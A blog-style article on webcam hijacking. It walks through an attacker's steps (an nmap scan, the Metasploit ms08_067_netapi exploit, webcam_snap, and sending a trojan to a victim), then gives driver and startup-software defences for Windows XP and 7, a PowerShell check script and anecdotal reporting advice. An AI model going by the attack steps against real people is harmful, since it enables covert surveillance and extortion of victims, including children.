Webcam Attacks Explained

This document provides a baseline for what you may see if your webcam is being attacked by someone on the internet. In this post we will also look at ways you can disable or damage the driver so that you can be sure you will not end up on someone's blackmail list. This document covers Windows XP Professional but also extends to Windows 7, 8 and above.

Introduction

It is becoming an attacker's favorite, and it is something that can easily be done. You can attack someone's webcam in a number of ways. In this example the issue is discussed from an attacker's standpoint, and finally we will discuss some options that you can employ to protect yourself and your family. This might save you a bit of trouble, and some cash in the process. More importantly, it may save your child from the embarrassment and psychological effects that can follow an attack like this.

Before I begin writing this article, I must say that this came from an event that had taken place and had caused me an amount of grief with the wonderful idiots at the NYPD, and thus made me question what the practices for not only computer crime but reporting for children's welfare were when it came to the NYPD. An old business partner approached me with a matter that she needed some help with. It was concerning her 12 or 13 year old granddaughter at the time. To make a long story short, what ended up happening was some degenerate attacked the child's computer and had taken candid snapshots of her. Of course with my background in security and forensics I was called to help identify how the attack took place and possibly run an analysis on the DISK IMAGE regarding what information I needed in order to check the logs, etc. Mind you, my investigative approach was only for the logs and assuring that a sound forensic image was procured for the grandmother. Nothing more.

Once I began to get involved my first stop was to contact the FBI, then the locale where the crime was committed. The FBI couldn't get involved for various reasons, and of course the local PD in their town of incidence could not get involved because -- well, it was well over their heads. In the meantime the NYPD had gotten wind of the situation during another process and had completely misinterpreted the issue and was doing what they do best. Arrest anyone to meet a quota. The purpose of this document is not only a technological write-up but also how to go about the reporting process so you can avoid the headaches.

How the Attack Comes Together

The first attack in nearly all cases happens with a mixture of an insecure system or vulnerable box and an attacker driven by greed. It normally flows like this: attack a box, find some pictures (webcam, your saved photos, e-mail photos, etc.) and then extort you for money "or else the images will be on facebook, twitter, etc." You know how this goes. So what ends up happening is that the user, or users, on the other end become fear-stricken and have no choice but to either fork over the money or watch their bare essentials go all over the internet. The psychological effects of this type of attack can have a long-lasting impact on a person of any age, especially if it's done to a child, as in the case I explained previously.

When an attacker scans a box, he or she will do the following:

From within the terminal on a Linux box, we've run the following command: nmap -sS -PN -v 192.168.1.3 (note that the IP address must match the IP address of your host within your network, virtual machine, or remote host for this to work). Once this has been performed, figure 1.0 demonstrates what information is returned from the nmap scan:


Scanning a system with nmap.

Considering that MSRPC DCOM would be patched, we've moved our sights to the following exploit: exploit/windows/smb/ms08_067_netapi. As the name implies, it's for netapi. The port that we are mainly concerned with targeting is microsoft-ds, on port 445 (CIFS). Within Metasploit we will enter the following (for the faint of heart see part II of the example):

From this point forward, we can issue the next command. In this example below, we see that there is a webcam that is returned.


Listing installed web cams.

Next, the attacker can issue the following command: webcam_snap. Once webcam_snap is executed you should see your webcam light up, just like it does when it's on and you're on Skype. If you see this happen and you're not using any video editing software, Skype or similar applications -- it should be a clear indication that you are being attacked. To do a live analysis of your system you can use the link here: Windows Live Analysis, but keep in mind that each attack is different where logs are concerned, and it has not been covered for this exploit. The forensic analysis only points to where you need to look and certain things to look for. The picture below is a snap of my webcam pointing at my server 2008 book.


Snapshot from a remote web cam.

Almost Protection in Windows XP

So we've covered one of the methods by which an attacker may obtain an image from your computer -- but how do we actually defend against this type of attack? Well, because we ran the exploit against Windows XP, we figured it would be prudent to cover Windows XP first and then Windows 7.

Right-click on "My Computer" and click on "Properties." Click the "Hardware" tab, and select the button that says "Device Manager." In the Device Manager, if you click the + icon on "Sound Video and Game Controllers" you will expose the driver for your webcam. Your options for this segment are to disable, delete, or reinstall the driver. In this case we will disable the driver, or if you'd like you can delete it. Disabling disallows access to it and is easier to manage if we want to use a program such as Skype later on. The figure below demonstrates our webcam.


Web Cam Driver in Windows XP.

Now that the driver is disabled, move your way into msconfig and locate, within the "Startup" and/or "Services" tab, anything that belongs to your webcam. In this segment, you want to uncheck them both and click on "Apply" and then click on "OK." Once that is finished you should reboot the computer. If we launch the attack again against the system, you will notice that -- well... It still works... WTH!? Why? Well, Windows XP is somehow loading the drivers needed. Although these steps should protect you, they have failed against subsequent re-visits to exploit the box and/or send it trojans (as you will see in other examples). That said, they are somewhat effective within Windows 7.

Hacking Windows 7

There are a few ways you can hack Windows 7. One of the methods is webdav, which is well patched by now, and the other is the Metasploit trojan that we will discuss herein. In order to launch this type of attack against a Windows 7 box, you first need to build yourself a trojan from Metasploit. In order to do so, please follow the next set of instructions:

Once you've run this option, you can then proceed to sending the "Trojan.exe" application to a victim that might not know that he or she is going to be attacked. Once they click on the exe file, you can then begin your attack. In any case some information will flood the screen and you will know that you are in the computer you are targeting. From here you simply issue the commands we entered when we did the exploit against Windows XP: webcam_list, and of course webcam_snap. This will get you what you want. A nice picture of your victim. Now, within Windows 7 you can do a few things. And, from our testing we've found the following details:

  1. Disabling the Driver: Does not prevent the system from being exposed to the attack.
  2. Disabling the Software from Loading and Disabling Driver: During our tests, if you disable the webcam software from startup the attack freezes and a timeout error is presented. At which point the victim must remove and re-insert the camera (if external). When the camera is removed the session dies and is disconnected from msf. If you are successful in getting the system to reconnect, the camera becomes unresponsive.
  3. Only Disabling Webcam Software: Seems to work best. No need to disable the driver.

Disabling the Software in Windows 7

Click on Start, and then enter msconfig. Once msconfig appears you might want to run it as administrator, or click it to launch the program. If you cannot find the program, hold down the Windows key, hit the R key and release. You will see a dialog called "Run" appear. Once this dialog appears enter "msconfig" without quotations and press Enter. Within msconfig, continue to the Startup tab and uncheck any webcam-related software. Click on "Apply" and then "OK" and restart your computer.


Disable Webcam Software.
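
The two settings compared in the Windows 7 tests above (driver state, and webcam software loading at startup) can also be checked from a script after the reboot. This is an added example, not part of the original post; it assumes Windows PowerShell 2.0 to 5.1 (for Get-WmiObject), and the name pattern is a guess that you should extend with your camera vendor's name.

```powershell
# Added example (not from the original post). Windows PowerShell 2.0-5.1.
# Reports whether the camera driver is enabled and whether webcam software
# or services are still set to load at startup.

# Assumption: this pattern is a guess; add your camera vendor's name to it.
$pattern = 'webcam|camera|\bcam\b'

# Device setup classes that usually hold cameras: Media ("Sound, video and
# game controllers"), Image ("Imaging devices") and Camera.
$classes = '{4d36e96c-e325-11ce-bfc1-08002be10318}',
           '{6bdd1fc6-810f-11d0-bec7-08002be2092f}',
           '{ca3e7ab9-b4c3-4ae6-8251-579ef933890f}'

Write-Host '== Camera devices =='
Get-WmiObject -Class Win32_PnPEntity |
    Where-Object { ($classes -contains $_.ClassGuid) -and ($_.Name -match $pattern) } |
    Select-Object Name, @{ Name = 'State'; Expression = {
        # Device Manager codes: 0 = working, 22 = disabled by the user.
        $code = $_.ConfigManagerErrorCode
        switch ($code) {
            0       { 'enabled' }
            22      { 'disabled' }
            default { "problem code $code" }
        } } } |
    Format-Table -AutoSize | Out-Host

Write-Host '== Startup entries that will load at the next logon =='
Get-WmiObject -Class Win32_StartupCommand |
    Where-Object { "$($_.Name) $($_.Command)" -match $pattern } |
    Select-Object Name, Command, Location, User |
    Format-List | Out-Host

Write-Host '== Services set to start automatically =='
Get-WmiObject -Class Win32_Service |
    Where-Object { ($_.StartMode -eq 'Auto') -and
                   ("$($_.Name) $($_.DisplayName)" -match $pattern) } |
    Select-Object Name, DisplayName, State |
    Format-Table -AutoSize | Out-Host
```

An empty startup and services section with the device still listed as enabled corresponds to the "Only Disabling Webcam Software" case in the list above.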

Reporting

In my experience, if a situation like this does arise you should skip over the local police department, especially that of the NYPD. Should you know that a child's welfare has been put at risk and are reporting the issue and you're not the party who is causing the child harm it's best to go straight to the FBI. You can google your local field office and contact them to procure any information that you may need. Should they get involved, depending on the attack it is best to unplug the Ethernet cable from the computer and make sure it stays on!

Police departments are not equipped to handle computer crime cases and will attempt (through my experience) to place full blame on you, and make you the suspect due to their lack of knowledge.
